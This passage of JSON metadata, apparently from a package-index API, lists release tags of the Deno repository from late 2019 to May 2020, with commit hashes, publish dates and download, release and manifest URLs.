-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.